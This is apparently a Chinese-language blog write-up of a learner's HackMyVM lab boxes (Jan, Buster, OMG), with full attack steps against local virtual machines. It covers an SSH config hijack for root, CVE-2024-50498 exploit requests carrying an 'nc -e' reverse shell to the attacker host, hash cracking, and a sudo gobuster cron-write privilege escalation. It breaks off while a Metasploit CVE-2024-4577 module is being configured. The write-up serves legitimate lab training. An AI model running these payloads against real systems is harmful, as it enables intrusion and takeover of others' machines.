HMV
HMV-启航
0x00 写在前面
最近在学习渗透的时候,偶然发现我的朋友-f4k3r师傅发了一个限时免费的靶场-Thunder,然后上手打了一下,发现只能拿到flag1,之后的flag好像还要免杀,cs上线之类的操作,我暂时还不是很会。然后我问了一下f4k3r师傅你怎么知道这个靶场的,他说是一个打渗透的群里发的,顺手转发了,于是我就想着进群里学习学习。进群后发现全是大佬,动不动就说hmv上号!我一开始都不知道hmv是什么,后来在群里潜水得知这是一个名叫HackMyVM的网站,有280多个靶机,难度也有分类,也有比较友好的靶机。昨天我才把DC-6打完,感觉学的比较基础(当然要先打基础),于是想着先把DC系列的靶场打完,再去尝试hmv的靶场。晚上睡觉之前看了一下群主的B站,发现好多靶场复盘的视频,讲的也比较详细(虽然没看几个复盘视频),偶然看到了
【常用靶机网站hackmyvm等入门介绍(含大佬博客地址)】https://www.bilibili.com/video/BV1uncUemEUD?vd_source=01f20e8c22d3c3bd0bcfdc7aa4cd8da0
这个视频,发现博主的这个入门视频讲的很详细,把HackMyVM的各个页面和功能讲的也很详细,以及介绍了一些大佬的博客以供参考。我也是从这个视频开始,想着打完DC打HMV。看视频的时候发现需要用到VirtualBox这个软件来导入虚拟机,于是就试着安装。
0x01 安装VirtualBox
去官网直接下载即可https://www.virtualbox.org/ 安装建议安装在D盘下,在D盘创建一个新的文件夹VirtualBox然后安装即可,记得安装python环境,安装好python环境之后好像还要下载一个pywin32(名字记不得了)使用命令pip install安装即可
0x02 报错问题解决
目前我遇到的报错问题状态码是-101和-104我在大傻子的小圈子的群里看到大佬说把完美世界竞技平台卸载了就行了,果然,卸载了就能启动虚拟机了
0x03 网络配置
为了我的kali(VMware)能够扫描到渗透靶机(VirtualBox),一开始以为只需要kali和渗透靶机桥接到同一个wifi就能够实现了,其实不然,研究了好久,当我在VMware中新建一个网络配置,使用桥接模式桥接到Host-Only时,发现kali是可以扫描到渗透靶机的
Jan
信息搜集
还是根据mac地址来确定ip地址
使用arp-scan -l扫描一下,确定ip地址为192.168.56.103,接着看一下端口情况,使用nmap 192.168.56.103 发现2个端口,22端口无疑就是ssh了,看一下8080端口是什么情况
8080端口渗透-user flag
貌似没有什么发现,使用dirsearch扫一下目录
dirsearch -u http://192.168.56.103
可以看到有robots.txt这个目录,看一下有什么,有/redirect和/credz,但是不知道是目录还是参数,都试试吧,一个说需要url参数,一个说仅可以内部访问,以为是简单的指定url参数就行了,结果啥也没获取到,猜测是在/redirect后面添加参数?url=/credz但是只显示了/credz这个页面的内容,尝试好多结果无果,看了下sunset大佬的写的wp:https://www.sunset-blog.top/baji/hack-my-vm/Jan.html (打这个靶机的时候还在,2025/4/26看的时候已经没了)
发现是用了两次url参数/redirect?url=1&url=/credz然后拿到了ssh登录的账号和密码
ssh/EazyLOL
ssh连接进去就能拿到user flag了
![e2aabe09497d1b6c07979853c9f4ae82_MD5.jpg]]
HMVSSWYMCNFIBDAFMTHFK
拿下user flag,下面就是提权拿root flag 了
提权-root flag
发现可以使用root权限执行/sbin/service sshd restart,那重点应该是在ssh了
参考了sunset师傅的博客
ssh公钥劫持
先查看一下ssh目录的权限
![18a3983fe213f07684ea324c2854580a_MD5.jpg]]
发现ssh_config和sshd_config是有修改权限的
ssh-keygen -t rsa 是用来生成 RSA 类型的 SSH 密钥对的命令。执行这个命令会生成一个公钥和一个私钥文件,用于 SSH 连接认证,会在家目录生成.ssh 文件夹
jan:/etc/ssh$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ssh/.ssh/id_rsa): /home/ssh/.ssh
/home/ssh/.ssh already exists.
Overwrite (y/n)? n
jan:/etc/ssh$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/ssh/.ssh/id_rsa):
Enter passphrase for "/home/ssh/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/ssh/.ssh/id_rsa
Your public key has been saved in /home/ssh/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Zk1qHaiYz6IhTLi3t5/4v9+8PceSvbsWY4MBOdrDQyk ssh@jan
The key's randomart image is:
+---[RSA 3072]----+
| o |
| E * |
| . O o |
|. o . * * . |
|.. o . S o o o |
|o. o + . = |
|o.o . o .++|
| o +.o . o .+.+|
| o.o++.oo. +.oB+|
+----[SHA256]-----+
将id_rsa.pub名字进行修改,然后将内容的最后的结尾的ssh修改为root(不会影响加解密但是会将其混淆)
mv id_rsa.pub attack_keys
修改sshd_config配置文件
PermitRootLogin yes
StrictModes no
AuthorizedKeysFile /home/ssh/.ssh/attack_keys
参数解释:
PermitRootLogin yes:允许 root 用户通过 SSH 登录。
StrictModes no:禁用权限严格检查,避免因权限问题阻止 SSH 登录。
AuthorizedKeysFile /home/ssh/.ssh/attack_keys:指定使用自定义的公钥文件 attack_keys。
修改ssh_config ,注释掉banner
#Banner /etc/shadow
重启服务,并使用密钥文件进行登录,即可获得root权限
![1bdfa8c030fb0689c086c0911f317878_MD5.jpg]]
jan:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jan:~# ls
root.txt ver.sh
jan:~# cat root.txt
HMV2PRMTERWTFUDNGMBG
小结
Jan这个靶机,他有一个8080端口的服务,通过提交参数,可以得到ssh连接的账号和密码,然后登录之后发现可以修改ssh相关配置文件,想到用ssh公钥劫持来提权,这一点如果想到的话就很好做了
Buster
信息搜集
看一眼mac地址:08:00:27:36:6e:6f使用arp-scan -l确定ip地址
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:50:3f:be PCS Systemtechnik GmbH
192.168.56.105 08:00:27:36:6e:6f PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.123 seconds (120.58 hosts/sec). 3 responded
ip地址为192.168.56.105使用nmap扫描一下端口情况
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 17:44 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.0021s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:36:6E:6F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
确定22和80端口开放,先看一眼80端口,发现是wordpress博客,那就上WPscan
80端口渗透-user flag
使用wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
┌──(root㉿kali-plus)-[~]
└─# wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.105/ [192.168.56.105]
[+] Started: Wed Feb 26 14:44:33 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.14.2
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.105/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.105/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.105/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.105/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
Fingerprinting the version - Time: 00:00:10 <====================================================================================================================================================> (702 / 702) 100.00% Time: 00:00:10
[i] The WordPress version could not be detected.
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:55:36 <===============================================================================================================================================> (109023 / 109023) 100.00% Time: 00:55:36
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.105/wp-content/plugins/akismet/
| Last Updated: 2025-02-04T21:01:00.000Z
| Readme: http://192.168.56.105/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/, status: 200
|
| Version: 5.3.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
[+] feed
| Location: http://192.168.56.105/wp-content/plugins/feed/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/feed/, status: 200
|
| The version could not be determined.
[+] wp-query-console
| Location: http://192.168.56.105/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/wp-query-console/, status: 403
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] ta0
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.56.105/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] welcome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 26 15:40:30 2025
[+] Requests Done: 110362
[+] Cached Requests: 15
[+] Data Sent: 29.523 MB
[+] Data Received: 62.695 MB
[+] Memory used: 407.828 MB
[+] Elapsed time: 00:55:56
扫出来2个用户名和几个插件,这个wp-query-console插件应该是有漏洞的,找一下,找到了CVE-2024-50498这个关于插件的漏洞
POST /wp-json/wqc/v1/query HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0
{"queryArgs":"phpinfo();","queryType":"post"}
页面返回的结果发现了disable_functions
发现反引号能执行命令,尝试反弹一个shell
POST /wp-json/wqc/v1/query HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 70
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0
{"queryArgs":"`nc -e /bin/sh 192.168.56.101 4444`","queryType":"post"}
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 4444
nc: getnameinfo: Temporary failure in name resolution
nc: getnameinfo: Temporary failure in name resolution
ls
index.php
license.txt
readme.html
update_url.php
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
发现成功反弹shell,生成一个交互式shell python -c 'import pty;pty.spawn("/bin/bash")'
拿到的是www-data的权限
www-data@listen:~/html/wordpress$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1001:1001::/home/welcome:/bin/sh
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
还有一个welcome的用户,猜测要先提权到welcome用户,最后再拿root
找到了配置文件的一些信息
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'll104567' );
/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );
尝试连接进去找一下用户的账号密码
MariaDB [wordpress]> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| 1 | ta0 | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0 | 2814928906@qq.com | http://192.168.31.181 | 2025-01-08 03:10:43 | | 0 | ta0 |
| 2 | welcome | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome | 127.0.0.1@qq.com | | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. | 0 | welcome |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.000 sec)
尝试爆破一下这2个账户的密码,但是ta0这个账户的密码应该是爆破不出来的(能爆破出来这靶机就没意思了)
┌──(root㉿kali-plus)-[~]
└─# vi hash
┌──(root㉿kali-plus)-[~]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
104567 (?)
1g 0:00:00:02 DONE 3/3 (2025-02-26 17:45) 0.3968g/s 73821p/s 73821c/s 73821C/s bosho..shymur
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
爆破出来的密码为104567,直接连接
$ cat user.txt
cat user.txt
29e0f786e8c90b3ce82e00de0ec7e7d3
先拿下user's flag,接着找提权点进行提权
提权-root flag
$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster
尝试看了一下这个文件的内容,根本不是人读的,搜了一下才发现gobuster是一款用于目录和文件枚举的开源工具,简单看了一下使用教程(https://blog.csdn.net/2302_82189125/article/details/135999920)
尝试去扫描一下有没有root.txt,sudo gobuster -u "http://192.168.56.105" -w /root.txt
$ sudo gobuster -u "http://192.168.56.105" -w /root.txt
2025/02/25 10:42:51 [!] 1 error occurred:
* Wordlist (-w): File does not exist: /root.txt
貌似rootflag的名字不是root.txt,下面就没有什么思路了,看了眼大佬的博客,他们用到了一个pspy64这个工具( pspy是一个命令行工具,它可以在没有Root权限的情况下,监控Linux进程。)
把pspy64传到kali,在自己的kali上起个服务,把pspy64下载到靶机中
python3 -m http.server 80
wget http://192.168.56.101/pspy64
chmod +x pspy64
./pspy64
sudo gobuster -w /opt/.test.sh -u http://192.168.56.105 #默认模式为dir扫描目录文件w为指定字典,u指定url
192.168.56.104 - - [24/Jan/2025 06:21:00] "GET /echo%20test HTTP/1.1" 404 -
2025/02/25 12:12:01 CMD: UID=0 PID=3975 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3976 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3977 | /bin/sh /sbin/dhclient-script
2025/02/25 12:12:01 CMD: UID=0 PID=3978 | /usr/sbin/CRON -f
2025/02/25 12:12:01 CMD: UID=0 PID=3979 | /usr/sbin/CRON -f
2025/02/25 12:12:01 CMD: UID=0 PID=3980 | /bin/sh -c /bin/bash /opt/.test.sh
这是运行pspy64之后的一部分,可以看到有一个/opt/.test.sh的定时文件,看一下具体内容是什么
welcome@listen:~$ cat /opt/.test.sh
cat: /opt/.test.sh: Permission denied
看不了一点
welcome@listen:/opt$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 7 23:57 .
drwxr-xr-x 18 root root 4096 Jan 7 21:50 ..
-rwx------ 1 root root 10 Jan 7 23:57 .test.sh
输入sudo gobuster -w /opt/.test.sh -u http://192.168.56.105后的结果为:
welcome@listen:/opt$ sudo gobuster -w /opt/.test.sh -u http://192.168.56.101:9999
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101/
[+] Threads : 10
[+] Wordlist : /opt/.test.sh
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/02/25 12:26:20 Starting gobuster
=====================================================
2025/02/25 12:26:20 [!] unable to connect to http://192.168.56.101/: Get http://192.168.56.101/: dial tcp 192.168.56.101:80: connect: connection refused
=====================================================
2025/02/25 12:26:20 Finished
=====================================================
welcome@listen:/opt$ sudo gobuster -w /opt/.test.sh -u http://192.168.56.101:9999
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.56.101:9999/
[+] Threads : 10
[+] Wordlist : /opt/.test.sh
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/02/25 12:27:38 Starting gobuster
=====================================================
=====================================================
2025/02/25 12:27:38 Finished
=====================================================
其中sudo gobuster -w /opt/.test.sh -u http://192.168.56.105:9999这个命令的含义就是使用/opt/.test.sh这个文件的内容为字典,对-u所指定的目标地址进行目录扫描,而这个目标是我们在kali上起的一个服务,能够监听到对服务的访问,这样就能知道/opt/.test.sh文件里面的内容了
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
192.168.56.105 - - [26/Feb/2025 20:12:49] "GET / HTTP/1.1" 200 -
192.168.56.105 - - [26/Feb/2025 20:12:49] code 404, message File not found
192.168.56.105 - - [26/Feb/2025 20:12:49] "GET /77aacc5f-f1f3-4c5f-943f-d890c284bc14 HTTP/1.1" 404 -
192.168.56.105 - - [26/Feb/2025 20:12:49] code 404, message File not found
192.168.56.105 - - [26/Feb/2025 20:12:49] "GET /echo%20test HTTP/1.1" 404 -
他里面有个echo test的定时任务,然后下面的步骤是
可以在自己的kali中新建一个文件夹,然后创建一个a,再起个服务,然后返回靶机运行gobuster的指令
mkdir buster
cd buster
touch a
python3 -m http.server 9999
welcome@listen:/opt$ cd /tmp
welcome@listen:/tmp$ ls
systemd-private-62ede0bd298b4c10934121beaac91a3a-systemd-timesyncd.service-4ariZG
welcome@listen:/tmp$ echo 'a' > a.txt
welcome@listen:/tmp$ sudo gobuster -w a.txt -u http://192.168.56.101:9999 -n -q
/a
返回/a的原因是我们关闭了状态码的显示并使用-q开启了安静模式,因此返回的结果就是所扫描到的目录路径
(前提是kali上开启服务的文件夹中有a这个文件) 这样就能拼接字符了,既然能够拼接字符,那么可以尝试一下拼接出一个反弹shell的命令,还是在kali上的那个文件夹中,新建一个tmp文件夹(因为我们在/tmp文件夹下),然后文件夹下面有一个b文件
mkdir tmp
cd tmp
touch b
cd ..
python3 -m http.server 9999
welcome@listen:/tmp$ echo 'nc -e /bin/bash 192.168.56.101 4444' > b
welcome@listen:/tmp$ chmod +x b
welcome@listen:/tmp$ pwd
/tmp
welcome@listen:/tmp$ echo 'tmp/b' > a.txt
welcome@listen:/tmp$ sudo gobuster -w a.txt -u http://192.168.56.101:9999 -n -q
/tmp/b
这一步的目的是为了拼接出/tmp/b路径,其中靶机中的b文件中写着反弹shell的命令,接下来我们在原来的命令上加上-o参数,这个参数的作用是将命令返回的结果输入到被指定的文件中,这样就能把/tmp/b也就是/tmp/nc -e /bin/bash 192.168.56.101 4444这个命令写入到定时任务/opt/.test.sh中,当这个定时任务被运行的时候,就能反弹shell了
sudo gobuster -w a.txt -u http://192.168.56.101:9999 -n -q -o /opt/.test.sh
┌──(root㉿kali-plus)-[~]
└─# nc -lvvp 4444
nc: getnameinfo: Temporary failure in name resolution
id
nc: getnameinfo: Temporary failure in name resolution
uid=0(root) gid=0(root) groups=0(root)
可以看到已经监听到了,下面直接拿root flag即可
小结
这个靶场,先从外网打点,还是挺好打的,因为是wordpress搭建的博客系统,先使用wpscan扫描一下发现有一些插件,可以搜到插件的漏洞,有现成的poc,直接利用就好了,可以执行命令,直接反弹shell,但是发现有其他2个用户,既然是wordpress了,而且还有配置文件,就能拿到数据库的账密,连进去找一下welcome的密码,登录进welcome用户拿到user flag,下面提权就是围绕gobuster这个工具可以读取文件的内容,也可以写入内容到指定文件,这样就能把反弹shell的命令写到定时文件中,其中还有一个无需root权限就能查看定时任务的工具pspy64,这样一来,只要定时任务被执行,就能拿到root权限的shell,达到提权的效果
OMG
信息搜集
首先这是一个windows的虚拟机,使用VMware导入,用VituralBox会报错,导入之后先确定ip地址,mac地址为00:0C:29:E7:D5:95使用arp-scan扫描得到ip地址为192.168.136.134,然后扫一下端口
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.136.134 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2025-02-26 20:54 EST
Nmap scan report for bogon (192.168.136.134)
Host is up (0.00030s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
MAC Address: 00:0C:29:E7:D5:95 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
搜索了一下作者,发现作者有写博客https://blog.orange.tw/ 在他的博客里看到一个CVE的版本号,猜测本靶机和这个CVE有关,使用msf搜索一波,msf好久没更新了,低版本搜不到这个CVE,更新一下即可
user flag 和 root flag
┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: When in a module, use back to go back to the top level
prompt
`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`
=[ metasploit v6.4.50-dev ]
+ -- --=[ 2495 exploits - 1283 auxiliary - 393 post ]
+ -- --=[ 1607 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2024-4577
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577 2024-06-06 excellent Yes PHP CGI Argument Injection Remote Code Execution
1 \_ target: Windows PHP . . . .
2 \_ target: Windows Command . . . .
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command'
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /php-cgi/php-cgi.exe yes The path to a PHP CGI endpoint
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.136.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows PHP
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload
payload => php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload
payload => php/meterpreter/reverse_tcp
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > show options
Module options (exploit/windows/http/php_cgi_arg_injection_rce_cve_2024_4577):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /php-cgi/php-cgi.exe yes The path to a PHP CGI endpoint
VHOST no HTTP server virtual host
Payload options (php/reverse_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.136.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows PHP
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > set rhosts 192.168.136.134
